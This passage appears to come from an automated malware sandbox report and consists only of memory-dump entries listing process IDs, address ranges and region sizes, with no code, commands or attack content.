                      • memory/1900-292-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/1920-212-0x0000000000000000-mapping.dmp
                      • memory/1928-615-0x0000000000000000-mapping.dmp
                      • memory/1948-309-0x0000000000000000-mapping.dmp
                      • memory/1948-322-0x0000000000710000-0x0000000000713000-memory.dmp
                        Filesize

                        12KB

                      • memory/1948-313-0x00000000711B0000-0x000000007189E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1948-323-0x0000000004CC0000-0x0000000004CC2000-memory.dmp
                        Filesize

                        8KB

                      • memory/1948-321-0x00000000006F0000-0x0000000000701000-memory.dmp
                        Filesize

                        68KB

                      • memory/1948-318-0x0000000000590000-0x0000000000591000-memory.dmp
                        Filesize

                        4KB

                      • memory/1948-314-0x0000000000070000-0x0000000000071000-memory.dmp
                        Filesize

                        4KB

                      • memory/1992-15-0x0000000000000000-mapping.dmp
                      • memory/2128-294-0x0000000000000000-mapping.dmp
                      • memory/2128-344-0x00000000004E0000-0x0000000000503000-memory.dmp
                        Filesize

                        140KB

                      • memory/2128-298-0x00000000013C0000-0x00000000013C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2128-297-0x00000000711B0000-0x000000007189E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2128-346-0x0000000000720000-0x0000000000744000-memory.dmp
                        Filesize

                        144KB

                      • memory/2212-602-0x0000000000000000-mapping.dmp
                      • memory/2272-608-0x0000000000000000-mapping.dmp
                      • memory/2300-201-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/2300-197-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/2300-198-0x000000000041A684-mapping.dmp
                      • memory/2364-614-0x0000000000000000-mapping.dmp
                      • memory/2432-606-0x0000000000000000-mapping.dmp
                      • memory/2432-610-0x0000000000000000-mapping.dmp
                      • memory/2432-604-0x0000000000000000-mapping.dmp
                      • memory/2432-603-0x0000000000090000-0x0000000000091000-memory.dmp
                        Filesize

                        4KB

                      • memory/2432-605-0x00000000000D0000-0x00000000000D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2432-613-0x0000000000000000-mapping.dmp
                      • memory/2432-612-0x0000000000110000-0x0000000000111000-memory.dmp
                        Filesize

                        4KB

                      • memory/2436-214-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2436-217-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2436-215-0x000000000043FCC3-mapping.dmp
                      • memory/2452-229-0x0000000000480000-0x0000000000481000-memory.dmp
                        Filesize

                        4KB

                      • memory/2452-226-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2452-254-0x0000000000EA0000-0x0000000000EF1000-memory.dmp
                        Filesize

                        324KB

                      • memory/2452-224-0x00000000711B0000-0x000000007189E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2452-222-0x0000000000000000-mapping.dmp
                      • memory/2484-107-0x0000000071230000-0x000000007191E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2484-104-0x0000000000000000-mapping.dmp
                      • memory/2484-185-0x0000000004870000-0x0000000004920000-memory.dmp
                        Filesize

                        704KB

                      • memory/2484-213-0x0000000000CD0000-0x0000000000CDD000-memory.dmp
                        Filesize

                        52KB

                      • memory/2484-108-0x0000000000D70000-0x0000000000D71000-memory.dmp
                        Filesize

                        4KB

                      • memory/2488-286-0x00000000004A0000-0x00000000004C4000-memory.dmp
                        Filesize

                        144KB

                      • memory/2488-265-0x0000000000000000-mapping.dmp
                      • memory/2488-278-0x0000000000490000-0x0000000000491000-memory.dmp
                        Filesize

                        4KB

                      • memory/2488-268-0x0000000072E70000-0x000000007355E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2488-275-0x00000000012D0000-0x00000000012D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2544-114-0x0000000000000000-mapping.dmp
                      • memory/2564-119-0x0000000000000000-mapping.dmp
                      • memory/2608-144-0x000007FEF7960000-0x000007FEF7BDA000-memory.dmp
                        Filesize

                        2.5MB

                      • memory/2664-127-0x0000000000000000-mapping.dmp
                      • memory/2688-535-0x0000000000000000-mapping.dmp
                      • memory/2688-485-0x0000000000000000-mapping.dmp
                      • memory/2688-598-0x0000000000000000-mapping.dmp
                      • memory/2688-597-0x0000000003C80000-0x0000000003C81000-memory.dmp
                        Filesize

                        4KB

                      • memory/2688-595-0x0000000000000000-mapping.dmp
                      • memory/2688-593-0x0000000000000000-mapping.dmp
                      • memory/2688-591-0x0000000000000000-mapping.dmp
                      • memory/2688-356-0x00000000000A0000-0x00000000000A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2688-357-0x0000000000000000-mapping.dmp
                      • memory/2688-358-0x0000000000120000-0x0000000000121000-memory.dmp
                        Filesize

                        4KB

                      • memory/2688-359-0x0000000000000000-mapping.dmp
                      • memory/2688-361-0x0000000000000000-mapping.dmp
                      • memory/2688-363-0x0000000000000000-mapping.dmp
                      • memory/2688-365-0x0000000000000000-mapping.dmp
                      • memory/2688-367-0x0000000000000000-mapping.dmp
                      • memory/2688-369-0x0000000000000000-mapping.dmp
                      • memory/2688-371-0x0000000000000000-mapping.dmp
                      • memory/2688-373-0x0000000000000000-mapping.dmp
                      • memory/2688-375-0x0000000000000000-mapping.dmp
                      • memory/2688-377-0x0000000000000000-mapping.dmp
                      • memory/2688-379-0x0000000000000000-mapping.dmp
                      • memory/2688-381-0x0000000000000000-mapping.dmp
                      • memory/2688-383-0x0000000000000000-mapping.dmp
                      • memory/2688-385-0x0000000000000000-mapping.dmp
                      • memory/2688-387-0x0000000000000000-mapping.dmp
                      • memory/2688-389-0x0000000000000000-mapping.dmp
                      • memory/2688-391-0x0000000000000000-mapping.dmp
                      • memory/2688-393-0x0000000000000000-mapping.dmp
                      • memory/2688-395-0x0000000000000000-mapping.dmp
                      • memory/2688-397-0x0000000000000000-mapping.dmp
                      • memory/2688-399-0x0000000000000000-mapping.dmp
                      • memory/2688-401-0x0000000000000000-mapping.dmp
                      • memory/2688-403-0x0000000000000000-mapping.dmp
                      • memory/2688-405-0x0000000000000000-mapping.dmp
                      • memory/2688-407-0x0000000000000000-mapping.dmp
                      • memory/2688-409-0x0000000000000000-mapping.dmp
                      • memory/2688-411-0x0000000000000000-mapping.dmp
                      • memory/2688-413-0x0000000000000000-mapping.dmp
                      • memory/2688-415-0x0000000000000000-mapping.dmp
                      • memory/2688-417-0x0000000000000000-mapping.dmp
                      • memory/2688-419-0x0000000000000000-mapping.dmp
                      • memory/2688-421-0x0000000000000000-mapping.dmp
                      • memory/2688-423-0x0000000000000000-mapping.dmp
                      • memory/2688-425-0x0000000000000000-mapping.dmp
                      • memory/2688-427-0x0000000000000000-mapping.dmp
                      • memory/2688-429-0x0000000000000000-mapping.dmp
                      • memory/2688-431-0x0000000000000000-mapping.dmp
                      • memory/2688-433-0x0000000000000000-mapping.dmp
                      • memory/2688-435-0x0000000000000000-mapping.dmp
                      • memory/2688-437-0x0000000000000000-mapping.dmp
                      • memory/2688-439-0x0000000000000000-mapping.dmp
                      • memory/2688-441-0x0000000000000000-mapping.dmp
                      • memory/2688-443-0x0000000000000000-mapping.dmp
                      • memory/2688-445-0x0000000000000000-mapping.dmp
                      • memory/2688-447-0x0000000000000000-mapping.dmp
                      • memory/2688-449-0x0000000000000000-mapping.dmp
                      • memory/2688-451-0x0000000000000000-mapping.dmp
                      • memory/2688-453-0x0000000000000000-mapping.dmp
                      • memory/2688-455-0x0000000000000000-mapping.dmp
                      • memory/2688-457-0x0000000000000000-mapping.dmp
                      • memory/2688-459-0x0000000000000000-mapping.dmp
                      • memory/2688-461-0x0000000000000000-mapping.dmp
                      • memory/2688-463-0x0000000000000000-mapping.dmp
                      • memory/2688-465-0x0000000000000000-mapping.dmp
                      • memory/2688-467-0x0000000000000000-mapping.dmp
                      • memory/2688-469-0x0000000000000000-mapping.dmp
                      • memory/2688-471-0x0000000000000000-mapping.dmp
                      • memory/2688-473-0x0000000000000000-mapping.dmp
                      • memory/2688-475-0x0000000000000000-mapping.dmp
                      • memory/2688-477-0x0000000000000000-mapping.dmp
                      • memory/2688-479-0x0000000000000000-mapping.dmp
                      • memory/2688-481-0x0000000000000000-mapping.dmp
                      • memory/2688-483-0x0000000000000000-mapping.dmp
                      • memory/2688-589-0x0000000000000000-mapping.dmp
                      • memory/2688-487-0x0000000000000000-mapping.dmp
                      • memory/2688-489-0x0000000000000000-mapping.dmp
                      • memory/2688-491-0x0000000000000000-mapping.dmp
                      • memory/2688-493-0x0000000000000000-mapping.dmp
                      • memory/2688-495-0x0000000000000000-mapping.dmp
                      • memory/2688-497-0x0000000000000000-mapping.dmp
                      • memory/2688-499-0x0000000000000000-mapping.dmp
                      • memory/2688-501-0x0000000000000000-mapping.dmp
                      • memory/2688-503-0x0000000000000000-mapping.dmp
                      • memory/2688-505-0x0000000000000000-mapping.dmp
                      • memory/2688-507-0x0000000000000000-mapping.dmp
                      • memory/2688-509-0x0000000000000000-mapping.dmp
                      • memory/2688-511-0x0000000000000000-mapping.dmp
                      • memory/2688-513-0x0000000000000000-mapping.dmp
                      • memory/2688-515-0x0000000000000000-mapping.dmp
                      • memory/2688-517-0x0000000000000000-mapping.dmp
                      • memory/2688-519-0x0000000000000000-mapping.dmp
                      • memory/2688-521-0x0000000000000000-mapping.dmp
                      • memory/2688-523-0x0000000000000000-mapping.dmp
                      • memory/2688-525-0x0000000000000000-mapping.dmp
                      • memory/2688-527-0x0000000000000000-mapping.dmp
                      • memory/2688-529-0x0000000000000000-mapping.dmp
                      • memory/2688-531-0x0000000000000000-mapping.dmp
                      • memory/2688-533-0x0000000000000000-mapping.dmp
                      • memory/2688-587-0x0000000000000000-mapping.dmp
                      • memory/2688-537-0x0000000000000000-mapping.dmp
                      • memory/2688-539-0x0000000000000000-mapping.dmp
                      • memory/2688-541-0x0000000000000000-mapping.dmp
                      • memory/2688-543-0x0000000000000000-mapping.dmp
                      • memory/2688-545-0x0000000000000000-mapping.dmp
                      • memory/2688-547-0x0000000000000000-mapping.dmp
                      • memory/2688-549-0x0000000000000000-mapping.dmp
                      • memory/2688-551-0x0000000000000000-mapping.dmp
                      • memory/2688-553-0x0000000000000000-mapping.dmp
                      • memory/2688-555-0x0000000000000000-mapping.dmp
                      • memory/2688-557-0x0000000000000000-mapping.dmp
                      • memory/2688-559-0x0000000000000000-mapping.dmp
                      • memory/2688-561-0x0000000000000000-mapping.dmp
                      • memory/2688-563-0x0000000000000000-mapping.dmp
                      • memory/2688-565-0x0000000000000000-mapping.dmp
                      • memory/2688-567-0x0000000000000000-mapping.dmp
                      • memory/2688-569-0x0000000000000000-mapping.dmp
                      • memory/2688-571-0x0000000000000000-mapping.dmp
                      • memory/2688-573-0x0000000000000000-mapping.dmp
                      • memory/2688-575-0x0000000000000000-mapping.dmp
                      • memory/2688-577-0x0000000000000000-mapping.dmp
                      • memory/2688-579-0x0000000000000000-mapping.dmp
                      • memory/2688-581-0x0000000000000000-mapping.dmp
                      • memory/2688-583-0x0000000000000000-mapping.dmp
                      • memory/2688-585-0x0000000000000000-mapping.dmp
                      • memory/2692-133-0x0000000000000000-mapping.dmp
                      • memory/2724-137-0x0000000000000000-mapping.dmp
                      • memory/2724-259-0x0000000000417A8B-mapping.dmp
                      • memory/2724-261-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/2724-258-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/2736-251-0x0000000000000000-mapping.dmp
                      • memory/2756-142-0x0000000000000000-mapping.dmp
                      • memory/2800-157-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/2800-152-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/2800-154-0x000000000043FCC3-mapping.dmp
                      • memory/2808-153-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/2808-160-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/2808-155-0x0000000000417A8B-mapping.dmp
                      • memory/2888-165-0x000000000043FCC3-mapping.dmp
                      • memory/2940-352-0x0000000002730000-0x0000000002731000-memory.dmp
                        Filesize

                        4KB

                      • memory/2940-345-0x0000000000000000-mapping.dmp
                      • memory/2940-351-0x0000000004B60000-0x0000000004B61000-memory.dmp
                        Filesize

                        4KB

                      • memory/2940-353-0x0000000004B00000-0x0000000004B01000-memory.dmp
                        Filesize

                        4KB

                      • memory/2940-349-0x00000000711B0000-0x000000007189E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2940-350-0x0000000002500000-0x0000000002501000-memory.dmp
                        Filesize

                        4KB

                      • memory/2964-175-0x0000000000417A8B-mapping.dmp
                      • memory/2972-249-0x0000000000000000-mapping.dmp
                      • memory/2984-250-0x0000000000000000-mapping.dmp
                      • memory/3032-340-0x0000000000000000-mapping.dmp